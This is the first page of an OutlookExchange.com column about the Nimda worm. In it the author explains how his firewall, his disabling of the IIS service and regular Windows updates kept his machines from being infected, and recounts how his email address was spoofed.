Become a Columnist Microsoft Exchange Site Microsoft Support SiteMSDN Exchange Site

   

Subscribe to OutlookExchange
What's New
Columnist
Anderson Patricio
Ann Mc Donough
Bob Spurzem
Brian Veal
Catherine Creary
Cherry Beado
Colin Janssen
Collins Timothy Mutesaria
Drew Nicholson
Fred Volking
Glen Scales
Goran Husman
Guy Thomas
Henrik Walther
Jason Sherry
Jayme Bowers
John Young
Joyce Tang
Justin Braun
Konstantin Zheludev
Kristina Waters
Kuang Zhang
Mahmoud Magdy
Martin Tuip
Michael Dong
Michele Deo
Mitch Tulloch
Nicolas Blank
Pavel Nagaev
Ragnar Harper
Ricardo Silva
Richard Wakeman
Russ Iuliano
Santhosh Hanumanthappa
Steve Bryant
Steve Craig
Todd Walker
Tracey J. Rosenblath
Development
More Resources
Software
Other Links
 
   

Windows and Office updates protected many from Nimda
Page 1 | Page 2

Windows and Office updates protected many from Nimda

First of all, the release of Nimda was a horrible thing on so many levels. First of all, the timing could not have been worse and secondly, it is a ruthless piece of work. In case you have been living in a cave, this is a variant of the CodeRed that includes an email virus. Infected servers send out HTTP requests in order to find other servers to infect. Infected client machines send out emails with a wild subject line and a README.EXE attachment. In some cases, merely opening the message can affect the machine.

This virus has struck a personal note with me since my internet connection is still slow (because my ISP has infected machines all over it's network) and because I have learned that someone has been spoofing my outlookexchange.com email address. I found out about the mail spoofing from replies from angry recipients. I can guess that one or two things happened: 1) Someone had been spoofing my address all along and accidentally got infected by Nimda. 2) Someone spoofed my email address in order to spread the virus.

Nicolas Blank helped immensely in tracking down the problem. As I said before, I received approximately thirty emails from various systems that informed me that I had sent them a virus. None of the recipients were in my address lists and a quick scan proved that I was not infected. After some research I now understand why I was safe. I will explain.

Server Security

I have several servers including my notebook computer. My Notebook is running Windows XP server that has a built in firewall. By default, I turn that on since I am usually at a customer site and I keep confidential information about other projects and internal Microsoft documents on my machine.

To the right, you can see the configuration screen for this feature.

Now in my case, I use an additional level of security which is not to run the IIS service! I know this sounds a little too simple, but you cannot get infected if you aren't running the IIS service. In fact, I disable the service on any machine that does not specifically need it.

Windows Update

The rest of my servers are updated (manually) at regular intervals. I connect using the update service and make sure that IIS, the OS and any new security patch is updated. In fact, many of the known IIS vulnerabilities were corrected months ago. If you stay on top of this either through automatic or manual processes then you will be in a lot better shape when the next new hole is opened or otherwise exposed.

Continue

 

 
 

Windows and Office updates protected many from Nimda
Page 1 | Page 2

Disclaimer: Your use of the information contained in these pages is at your sole risk. All information on these pages is provided "as is", without any warranty, whether express or implied, of its accuracy, completeness, fitness for a particular purpose, title or non-infringement, and none of the third-party products or information mentioned in the work are authored, recommended, supported or guaranteed by Stephen Bryant or Pro Exchange. OutlookExchange.Com, Stephen Bryant and Pro Exchange shall not be liable for any damages you may sustain by using this information, whether direct, indirect, special, incidental or consequential, even if it has been advised of the possibility of such damages.

Copyright Stephen Bryant 2008